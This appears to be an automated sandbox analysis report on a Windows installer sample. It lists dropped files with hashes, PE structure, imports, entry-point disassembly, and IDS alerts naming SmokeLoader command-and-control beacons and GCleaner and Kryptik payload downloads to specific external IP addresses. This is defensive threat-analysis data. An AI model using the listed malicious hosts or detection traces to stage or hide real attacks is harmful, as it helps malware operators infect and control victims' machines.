                                      Preview:....7..o|..:=g..Fg....Q.x6....fCTCY.-.C.._x...|..3.......:YO....s.+].1.%{.rMt K.N...T..o'.+.r?>`S.P..n....Ud.uM......U{.o........F[..........................................".7.i}...].<[.H..uj.i.r.Y..._E.:.2..C./,.&F..<;...w.........9YEc<d...q$3.S;<...s.V.08,..]d$.G8...:Yt.).y.B..a#.3)...aE......r.#............................................k.P.V.O..9.z...y......u..CL..;.'.;.. .}.N...g.m.\...G5P....^..o.....].^.....f...b.S=...+..ai.0r..L(g..)....3j...R....R0.kf.c...........................................k.L.._...I>...^..~~......V...uS..+5..a.8...R'.V.B......C..R.AK2<]9.O...A=...N.s..\;F.N$.,.qi.\.^.7..6o~q.G?.#..Z.|..Q.5...}..S>y.Y...........................................;.M.t..H.u...2..w..Xx.SF..4.0....6~...u.[..^{...Sp#.)..n? {......\...3.....Y..c.@Je..K"....lW.q.2.0\k......\/...h.I}.@".Mr6..........................................j.M.e...9....n*.t..T...g.wk...\.S)p....v.j....M.I@x........V..y..#s.......{.0..l..]O>,.....f.Z=`..b...+j,..^.I&.}l2.x.
                                      Process:C:\Windows\explorer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):348672
                                      Entropy (8bit):6.015664208947374
                                      Encrypted:false
                                      SSDEEP:6144:IQ31DWvFRu0pIIC6nVm6j4qYmSkF/bzOdzzJIlt+MSq:9DWvSIvVNMqYmSkF/CzNIls
                                      MD5:BE60D71B303F2AAE5618315147C7D3F9
                                      SHA1:3193AA204C2CF5A82AC532AB9FD436ACAD7953C1
                                      SHA-256:E4BA726FBD2C56CD2426BA04823637264BE89A9807A935D0939DC1578BDD951E
                                      SHA-512:2C15B655B0CC12EB7BD5329A922DBDBA6F226748F45D03C777980CCE79A841C28A1D9DC1283D0A5C361E4EBD537F2BA4C1B44F59D3A5FAF132EAE48F1F884A77
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2&.tvG.'vG.'vG.'.1Q'mG.'.1d'DG.'.1e'.G.'.?\'sG.'vG.'.G.'.1`'wG.'.1U'wG.'.1R'wG.'RichvG.'................PE..L......^......................(.....`.............@...........................,.................................................<.....+..s....................+.....0...................................@............................................text............................... ..`.data...P-'.........................@....rsrc....s....+..t..................@..@.reloc........+......b..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):55
                                      Entropy (8bit):4.306461250274409
                                      Encrypted:false
                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                      Malicious:false
                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):1835008
                                      Entropy (8bit):4.471393510110413
                                      Encrypted:false
                                      SSDEEP:6144:3IXfpi67eLPU9skLmb0b48WSPKaJG8nAgejZMMhA2gX4WABl0uNkdwBCswSbh:4XD948WlLZMM6YFHK+h
                                      MD5:FFFF2E80E7F8BEC9AE5265F6BE0893D9
                                      SHA1:6852DF8CD5F95C9A0ED476DD8C91775A94BC64CE
                                      SHA-256:F5C4DF628D36EB32238093B9F0030F8686D615C8B2B63931576B3C0594A27921
                                      SHA-512:089A853B42C6C2ACF27B70D3D3C28BA392AFF634827DD53EB776976A5D3D4575ABE5EC3CA8EA827696B978E65AEA14693773DF77E4A28149256B998A68DB0292
                                      Malicious:false
                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.1A...................................................................................................................................................................................................................................................................................................................................................V-........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.999019779316821
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                                      File size:3'545'603 bytes
                                      MD5:efa310ffcb46aa3768de9aae3a8fdcda
                                      SHA1:fc57edeadc23e53610eb75881fc7d2cecc847387
                                      SHA256:abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb6bd2120da1c01fb1a5a
                                      SHA512:22578db72219ab2d80876d025475d74ec05db4a575d0b5c890033bb7cda9bcbf648217e6d140388643280802566b4fc4c77cd78f01d9d3f28b5594c2e406432d
                                      SSDEEP:98304:JDxSfQksG3P/rm5AUfWo7lvZTkKXUx5KyChc2tpi:JDkQbCK5Qo7lviyUocypi
                                      TLSH:00F53305CBC496BBCD369039F52FA14047521F7F2EF5F6264F208BAA7926E5742A42F0
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.....
                                      Icon Hash:3d2e0f95332b3399
                                      Entrypoint:0x4035d8
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x5F24D702 [Sat Aug 1 02:44:18 2020 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:c05041e01f84e1ccca9c4451f3b6a383
                                      Instruction
                                      sub esp, 000002D4h
                                      push ebx
                                      push esi
                                      push edi
                                      push 00000020h
                                      pop edi
                                      xor ebx, ebx
                                      push 00008001h
                                      mov dword ptr [esp+14h], ebx
                                      mov dword ptr [esp+10h], 0040A230h
                                      mov dword ptr [esp+1Ch], ebx
                                      call dword ptr [004080C8h]
                                      call dword ptr [004080CCh]
                                      and eax, BFFFFFFFh
                                      cmp ax, 00000006h
                                      mov dword ptr [0042A26Ch], eax
                                      je 00007F009C9E6D43h
                                      push ebx
                                      call 00007F009C9EA049h
                                      cmp eax, ebx
                                      je 00007F009C9E6D39h
                                      push 00000C00h
                                      call eax
                                      mov esi, 004082B0h
                                      push esi
                                      call 00007F009C9E9FC3h
                                      push esi
                                      call dword ptr [00408154h]
                                      lea esi, dword ptr [esi+eax+01h]
                                      cmp byte ptr [esi], 00000000h
                                      jne 00007F009C9E6D1Ch
                                      push 0000000Bh
                                      call 00007F009C9EA01Ch
                                      push 00000009h
                                      call 00007F009C9EA015h
                                      push 00000007h
                                      mov dword ptr [0042A264h], eax
                                      call 00007F009C9EA009h
                                      cmp eax, ebx
                                      je 00007F009C9E6D41h
                                      push 0000001Eh
                                      call eax
                                      test eax, eax
                                      je 00007F009C9E6D39h
                                      or byte ptr [0042A26Fh], 00000040h
                                      push ebp
                                      call dword ptr [00408038h]
                                      push ebx
                                      call dword ptr [00408298h]
                                      mov dword ptr [0042A338h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+34h]
                                      push 000002B4h
                                      push eax
                                      push ebx
                                      push 00421708h
                                      call dword ptr [0040818Ch]
                                      push 0040A384h
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xa60.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x65720x6600869e1d11bbf88d92521c022fa6f3d4f0False0.6623008578431373data6.453919385955138IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x13980x140079e286249499b713a2ddbee33baa50daFalse0.449609375data5.1367175827370986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xa0000x203780x600b6d02c867f7bfbcf68de2cfeea94fd73False0.5078125data4.096809083627214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x2b0000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x3b0000xa600xc00ee5366c0b6c3ce68a7cd0901528e1abeFalse0.4049479166666667data4.20968703407114IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x3b1900x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                      RT_DIALOG0x3b4780x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0x3b5780x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x3b6980x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x3b6f80x14dataEnglishUnited States1.2
                                      RT_MANIFEST0x3b7100x34bXML 1.0 document, ASCII text, with very long lines (843), with no line terminatorsEnglishUnited States0.5527876631079478
                                      DLLImport
                                      ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                      SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                      USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                      2024-08-21T10:57:16.929515+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H359942443192.168.2.4162.159.130.233
                                      2024-08-21T10:59:33.745707+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360050443192.168.2.4162.159.130.233
                                      2024-08-21T11:00:41.398811+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360100443192.168.2.4162.159.130.233
                                      2024-08-21T10:59:18.602448+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16003680192.168.2.445.9.20.13
                                      2024-08-21T10:59:18.602448+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616003680192.168.2.445.9.20.13
                                      2024-08-21T10:58:30.595516+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360004443192.168.2.4162.159.130.233
                                      2024-08-21T11:00:11.667367+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16007680192.168.2.445.9.20.13
                                      2024-08-21T11:00:11.667367+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616007680192.168.2.445.9.20.13
                                      2024-08-21T10:59:26.633655+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16004380192.168.2.445.9.20.13
                                      2024-08-21T10:59:26.633655+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616004380192.168.2.445.9.20.13
                                      2024-08-21T10:57:33.894339+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H359969443192.168.2.4162.159.130.233
                                      2024-08-21T11:00:07.577839+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360075443192.168.2.4162.159.130.233
                                      2024-08-21T11:00:01.948773+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360071443192.168.2.4162.159.130.233
                                      2024-08-21T10:57:45.127471+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H359975443192.168.2.4162.159.130.233
                                      2024-08-21T11:00:41.569507+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16009780192.168.2.445.9.20.13
                                      2024-08-21T11:00:41.569507+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616009780192.168.2.445.9.20.13
                                      2024-08-21T11:00:24.456510+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360087443192.168.2.4162.159.130.233
                                      2024-08-21T11:00:18.862793+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360083443192.168.2.4162.159.130.233
                                      2024-08-21T11:00:32.305962+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16009180192.168.2.445.9.20.13
                                      2024-08-21T11:00:32.305962+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616009180192.168.2.445.9.20.13
                                      2024-08-21T10:57:16.527142+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H359940443192.168.2.4172.67.132.113
                                      2024-08-21T10:58:50.306446+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16001580192.168.2.445.9.20.13
                                      2024-08-21T10:58:50.306446+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616001580192.168.2.445.9.20.13
                                      2024-08-21T10:59:02.352307+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16002480192.168.2.445.9.20.13
                                      2024-08-21T10:59:02.352307+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616002480192.168.2.445.9.20.13
                                      2024-08-21T10:59:28.129049+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360046443192.168.2.4162.159.130.233
                                      2024-08-21T10:57:52.783806+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload15996880192.168.2.445.9.20.13
                                      2024-08-21T10:57:52.783806+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M615996880192.168.2.445.9.20.13
                                      2024-08-21T10:57:03.226772+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16011880192.168.2.445.9.20.13
                                      2024-08-21T10:57:03.226772+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616011880192.168.2.445.9.20.13
                                      2024-08-21T10:58:07.797527+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H359991443192.168.2.4162.159.130.233
                                      2024-08-21T10:59:39.386329+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360054443192.168.2.4162.159.130.233
                                      2024-08-21T10:57:50.318003+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)15997780192.168.2.4188.40.141.211
                                      2024-08-21T10:57:50.318003+0200TCP2847712ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1715997780192.168.2.4188.40.141.211
                                      2024-08-21T10:57:50.318003+0200TCP2850316ETPRO MALWARE Observed SmokeLoader CnC Activity15997780192.168.2.4188.40.141.211
                                      2024-08-21T10:58:58.337526+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16002280192.168.2.445.9.20.13
                                      2024-08-21T10:58:58.337526+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616002280192.168.2.445.9.20.13
                                      2024-08-21T11:01:05.881179+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16011580192.168.2.445.9.20.13
                                      2024-08-21T11:01:05.881179+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616011580192.168.2.445.9.20.13
                                      2024-08-21T10:58:02.177324+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H359988443192.168.2.4162.159.130.233
                                      2024-08-21T10:57:39.501144+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H359972443192.168.2.4162.159.130.233
                                      2024-08-21T11:00:47.184475+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360104443192.168.2.4162.159.130.233
                                      2024-08-21T11:00:58.477405+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360112443192.168.2.4162.159.130.233
                                      2024-08-21T11:00:49.650539+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16010380192.168.2.445.9.20.13
                                      2024-08-21T11:00:49.650539+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616010380192.168.2.445.9.20.13
                                      2024-08-21T10:58:34.229229+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16000280192.168.2.445.9.20.13
                                      2024-08-21T10:58:34.229229+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616000280192.168.2.445.9.20.13
                                      2024-08-21T11:00:24.275254+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16008580192.168.2.445.9.20.13
                                      2024-08-21T11:00:24.275254+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616008580192.168.2.445.9.20.13
                                      2024-08-21T10:59:55.253881+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16006380192.168.2.445.9.20.13
                                      2024-08-21T10:59:55.253881+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616006380192.168.2.445.9.20.13
                                      2024-08-21T10:59:22.484880+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360041443192.168.2.4162.159.130.233
                                      2024-08-21T10:58:42.262286+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16001080192.168.2.445.9.20.13
                                      2024-08-21T10:58:42.262286+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616001080192.168.2.445.9.20.13
                                      2024-08-21T10:57:56.540566+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H359983443192.168.2.4162.159.130.233
                                      2024-08-21T11:00:45.634104+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16010180192.168.2.445.9.20.13
                                      2024-08-21T11:00:45.634104+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616010180192.168.2.445.9.20.13
                                      2024-08-21T10:59:14.587628+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16003380192.168.2.445.9.20.13
                                      2024-08-21T10:59:14.587628+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616003380192.168.2.445.9.20.13
                                      2024-08-21T10:59:35.024805+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16004880192.168.2.445.9.20.13
                                      2024-08-21T10:59:35.024805+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616004880192.168.2.445.9.20.13
                                      2024-08-21T10:59:30.660918+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16004580192.168.2.445.9.20.13
                                      2024-08-21T10:59:30.660918+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616004580192.168.2.445.9.20.13
                                      2024-08-21T10:58:13.448105+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H359994443192.168.2.4162.159.130.233
                                      2024-08-21T10:59:59.336871+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16006680192.168.2.445.9.20.13
                                      2024-08-21T10:59:59.336871+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616006680192.168.2.445.9.20.13
                                      2024-08-21T11:00:53.666394+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16010680192.168.2.445.9.20.13
                                      2024-08-21T11:00:53.666394+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616010680192.168.2.445.9.20.13
                                      2024-08-21T10:58:14.158762+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload15998080192.168.2.445.9.20.13
                                      2024-08-21T10:58:14.158762+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M615998080192.168.2.445.9.20.13
                                      2024-08-21T11:00:57.690084+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16011080192.168.2.445.9.20.13
                                      2024-08-21T11:00:57.690084+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616011080192.168.2.445.9.20.13
                                      2024-08-21T10:59:43.196401+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16005580192.168.2.445.9.20.13
                                      2024-08-21T10:59:43.196401+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616005580192.168.2.445.9.20.13
                                      2024-08-21T10:57:22.594371+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H359953443192.168.2.4162.159.130.233
                                      2024-08-21T10:58:24.786762+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360000443192.168.2.4162.159.130.233
                                      2024-08-21T11:01:01.853398+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16011380192.168.2.445.9.20.13
                                      2024-08-21T11:01:01.853398+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616011380192.168.2.445.9.20.13
                                      2024-08-21T10:58:46.290141+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16001380192.168.2.445.9.20.13
                                      2024-08-21T10:58:46.290141+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616001380192.168.2.445.9.20.13
                                      2024-08-21T10:59:47.213152+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16005780192.168.2.445.9.20.13
                                      2024-08-21T10:59:47.213152+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616005780192.168.2.445.9.20.13
                                      2024-08-21T10:57:50.895226+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H359978443192.168.2.4162.159.130.233
                                      2024-08-21T10:59:56.302056+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360067443192.168.2.4162.159.130.233
                                      2024-08-21T10:59:06.398217+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16002780192.168.2.445.9.20.13
                                      2024-08-21T10:59:06.398217+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616002780192.168.2.445.9.20.13
                                      2024-08-21T11:00:37.305394+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16009380192.168.2.445.9.20.13
                                      2024-08-21T11:00:37.305394+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616009380192.168.2.445.9.20.13
                                      2024-08-21T11:00:19.697545+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16008280192.168.2.445.9.20.13
                                      2024-08-21T11:00:19.697545+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616008280192.168.2.445.9.20.13
                                      2024-08-21T11:00:07.649429+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16007380192.168.2.445.9.20.13
                                      2024-08-21T11:00:07.649429+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616007380192.168.2.445.9.20.13
                                      2024-08-21T11:00:03.490004+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16007080192.168.2.445.9.20.13
                                      2024-08-21T11:00:03.490004+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616007080192.168.2.445.9.20.13
                                      2024-08-21T10:58:26.213014+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload15999580192.168.2.445.9.20.13
                                      2024-08-21T10:58:26.213014+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M615999580192.168.2.445.9.20.13
                                      2024-08-21T10:59:22.618763+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16004080192.168.2.445.9.20.13
                                      2024-08-21T10:59:22.618763+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616004080192.168.2.445.9.20.13
                                      2024-08-21T10:59:39.132181+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16005280192.168.2.445.9.20.13
                                      2024-08-21T10:59:39.132181+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616005280192.168.2.445.9.20.13
                                      2024-08-21T10:59:10.430870+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16003180192.168.2.445.9.20.13
                                      2024-08-21T10:59:10.430870+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616003180192.168.2.445.9.20.13
                                      2024-08-21T11:00:15.696828+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16007880192.168.2.445.9.20.13
                                      2024-08-21T11:00:15.696828+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616007880192.168.2.445.9.20.13
                                      2024-08-21T11:00:35.757223+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360096443192.168.2.4162.159.130.233
                                      2024-08-21T10:58:38.243341+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16000680192.168.2.445.9.20.13
